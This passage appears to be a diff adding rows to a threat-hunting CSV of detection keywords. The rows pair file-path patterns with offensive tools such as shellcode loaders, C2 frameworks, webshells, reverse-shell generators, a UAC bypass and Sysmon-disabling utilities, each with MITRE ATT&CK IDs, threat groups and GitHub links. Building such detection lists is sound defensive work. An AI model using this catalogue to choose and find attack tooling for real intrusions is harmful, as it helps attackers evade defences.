+"*/shellcode.bin.*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - 
TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z"
+"*/shellcode.hex*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z"
+"*/shellcode.hpp*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - 
T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z"
+"*/shellcode_excel*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z"
+"*/ShellCode_Loader*","offensive_tool_keyword","cobaltstrike","ShellCode_Loader - Msf&CobaltStrike Antivirus ShellCode loader. Shellcode_encryption - Antivirus Shellcode encryption generation tool. 
currently tested for Antivirus 360 & Huorong & Computer Manager & Windows Defender (other antivirus software not tested).","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Axx8/ShellCode_Loader","1","1","N/A","10","10","389","49","2022-09-20T07:24:25Z","2022-09-02T14:41:18Z"
+"*/shellcode_samples/*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
+"*/shellcode_sources/*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*/ShellcodeFluctuation*","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","1","N/A","10","10","770","143","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z" +"*/Shellcode-Hide.git*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*/SHELLCODELOADER*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used 
in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
+"*/Shellcode-Loader.git*","offensive_tool_keyword","Shellcode-Loader","dynamic shellcode loading","T1055 - T1055.012 - T1027 - T1027.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ReversingID/Shellcode-Loader","1","1","N/A","10","2","140","30","2023-09-08T06:55:34Z","2021-08-08T08:53:03Z"
+"*/shellcodes/utils.py*","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","1","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z"
+"*/shellcodetester*","offensive_tool_keyword","shellcodetester","This tools test generated ShellCodes","T1059.003 - T1059.005 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","POST Exploitation tools","https://github.com/helviojunior/shellcodetester","1","1","N/A","N/A","1","78","28","2023-04-24T22:34:25Z","2019-06-11T04:39:58Z"
+"*/ShellGhost.git*","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","9","899","103","2023-07-24T12:22:32Z","2023-07-01T16:56:58Z"
+"*/shellinject*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 
- T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z"
+"*/ShellPop*","offensive_tool_keyword","ShellPop","Shellpop is all about popping shells. With this tool you can generate easy and sophisticated reverse or bind shell commands to help you during penetration tests.","T1059 - T1574 - T1055 - T1021","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/0x00-0x00/ShellPop","1","0","N/A","N/A","10","1393","237","2019-04-02T14:53:19Z","2018-03-08T03:58:00Z"
+"*/Shells/shell.aspx*","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/JoelGMSec/PyShell","1","1","N/A","N/A","3","247","56","2023-04-19T14:00:00Z","2021-10-19T07:49:17Z"
+"*/Shells/shell.jsp*","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/JoelGMSec/PyShell","1","1","N/A","N/A","3","247","56","2023-04-19T14:00:00Z","2021-10-19T07:49:17Z"
+"*/Shells/shell.php*","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. 
Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/JoelGMSec/PyShell","1","1","N/A","N/A","3","247","56","2023-04-19T14:00:00Z","2021-10-19T07:49:17Z"
+"*/Shells/shell.py*","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/JoelGMSec/PyShell","1","1","N/A","N/A","3","247","56","2023-04-19T14:00:00Z","2021-10-19T07:49:17Z"
+"*/Shells/shell.sh*","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/JoelGMSec/PyShell","1","1","N/A","N/A","3","247","56","2023-04-19T14:00:00Z","2021-10-19T07:49:17Z"
+"*/Shells/tomcat.war*","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. 
Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/JoelGMSec/PyShell","1","1","N/A","N/A","3","247","56","2023-04-19T14:00:00Z","2021-10-19T07:49:17Z"
+"*/Shells/wordpress.zip*","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/JoelGMSec/PyShell","1","1","N/A","N/A","3","247","56","2023-04-19T14:00:00Z","2021-10-19T07:49:17Z"
+"*/shellshock.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z"
+"*/sherlocksecurity/*","offensive_tool_keyword","POC","POC and exploit tools on github","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/sherlocksecurity","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/Shhmon/*","offensive_tool_keyword","shhmon","Neutering Sysmon via driver unload","T1518.001 ","TA0007","N/A","N/A","Defense Evasion","https://github.com/matterpreter/Shhmon","1","1","N/A","N/A","3","210","35","2022-10-13T16:56:41Z","2019-09-12T14:13:19Z"
+"*/ShimsInstaller.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. 
vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*/shocknawe/*","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z"
+"*/shodan-api.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/shspawnas/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/ShuckNT.git*","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. 
It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","10","1","36","4","2023-02-02T10:40:59Z","2023-01-27T07:52:47Z" +"*/si1ent-le/CVE-2022-0847*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/si1ent-le/CVE-2022-0847","1","1","N/A","N/A","1","0","2","2022-03-08T05:18:15Z","2022-03-08T04:51:02Z" +"*/SigFlip.*","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*/sigflip.x64.*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*/sigflip.x86.*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*/SigFlip/*","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*/SigLoader.go*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*/SigLoader/*","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*/SigLoader/*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*/signer-exe.py*","offensive_tool_keyword","PayGen","FUD metasploit Persistence RAT","T1587 T1048 T1588 T1102 T1041","N/A","N/A","N/A","RAT","https://github.com/youhacker55/PayGen","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/SilentClean.exe*","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 
